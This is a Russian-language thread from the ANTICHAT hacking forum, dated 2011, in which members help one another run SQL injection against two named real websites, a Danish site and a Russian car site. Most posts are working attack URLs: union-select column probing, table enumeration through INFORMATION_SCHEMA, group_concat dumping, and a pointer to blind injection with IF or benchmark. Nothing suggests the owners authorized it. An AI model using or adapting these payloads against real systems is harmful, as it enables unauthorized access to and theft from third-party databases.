ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.06.2011, 15:04
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
Konqi спасибо, я так понял можно записать любой код, буду пробовать.
Вот ещё проблема
http://www.trommeslageren.dk/index2.php?id='0
ни могу подобрать поля
http://www.trommeslageren.dk/index2.php?id=-10+union+select+null,null..
ни чего не меняется
что тогда делать?
|
|
|
10.06.2011, 15:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.trommeslageren.dk/index2.php?id=0'+and+0+union+select+1,2,3,4,5,6,7--+
|
|
|
|
10.06.2011, 15:23
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
|
|
|
|
10.06.2011, 15:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от kroŧ
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
group_concat() для mysql
тока на все таблицы, а в пределах 1024 символов
krot читайте мануалы, там вы найдете все ответы на вашы вопросы
---------
на этом сайте форум ипб, смотрите в сторону форума
|
|
|
|
10.06.2011, 18:44
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от kroŧ
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
Можно и без огранечения в 1024 через IF или benchmark: /showpost.php?p=2298777&postcount=16
|
|
|
|
10.06.2011, 19:51
|
|
Познающий
Регистрация: 14.09.2008
Сообщений: 38
Провел на форуме:
162695
Репутация:
37
|
|
Сообщение от d1v
d1v said:
какая версия?
3 станларт
|
|
|
|
10.06.2011, 21:38
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите определить БД, похоже на Postgres, но вывода не могу добиться
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+and+1=0+union+sel ect+version()+--+
|
|
|
|
10.06.2011, 21:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Может туплю, конечно, но в упор не вижу тут никакой инъекции...
|
|
|
|
10.06.2011, 21:44
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от mailbrush
mailbrush said:
Может туплю, конечно, но в упор не вижу тут никакой инъекции...
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*1
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*4
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1+--+
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1,2+--+
|
|
|
|
10.06.2011, 21:49
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Туплю, туплю. Инъекция всё же есть. Но т.к. параметр page - то она, скорее всего, в операторе типа LIMIT, и через union её не получится раскрутить.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
